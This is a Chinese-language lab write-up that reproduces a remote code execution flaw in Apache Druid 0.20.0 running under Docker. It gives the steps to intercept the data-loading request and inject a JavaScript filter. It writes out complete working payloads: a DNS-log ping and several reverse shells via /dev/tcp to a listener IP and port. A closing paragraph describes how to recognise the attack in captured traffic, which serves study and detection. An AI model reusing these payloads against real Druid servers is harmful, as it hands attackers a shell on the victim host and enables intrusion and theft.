环境复现:docker 直接拉取 Apache Druid 0.20.0
实验步骤:
1、进入首页(localhost进入无法正常进行)
2、Load data → Local disk
3、Base directory >> quickstart/tutorial
4、File filter >> wikiticker-2015-09-12-sampled.json.gz
5、Preview
6、Next: Parse data(挂代理,burpsuite)
7、修改数据包,填入payload
1 DNS查询payload 2 3 ```php 4 {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", 5 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 7wsyab.dnslog.cn')}", 6 "dimension":"added", 7 "":{ 8 "enabled":"true" 9 } 10 }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}} 11 ```
1 {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", 2 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}", 3 "dimension":"added", 4 "":{ 5 "enabled":"true" 6 } 7 }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
以下语句是执行命令的代码
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/7777 0>&1')}"
docker运行时,要docker命令跑数据的时候就开始实验,中途如果退出docker再启动的话,可能会造成druid无法接手导数据,导致payload一直失败。
网络层面抓包判断是否为攻击的话,主要依靠多出来的部分和执行命令的代码,正常的请求是不会调用java.lang.Runtime.getRuntime()这个函数的,也不会有多出来的这部分代码,其中执行命令的代码是判断此次攻击何种目的的关键。
1 ":[],"filter":{"type":"javascript", 2 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/4444 0>&1')}", 3 "dimension":"added", 4 "":{ 5 "enabled":"true" 6 } 7 }}}},"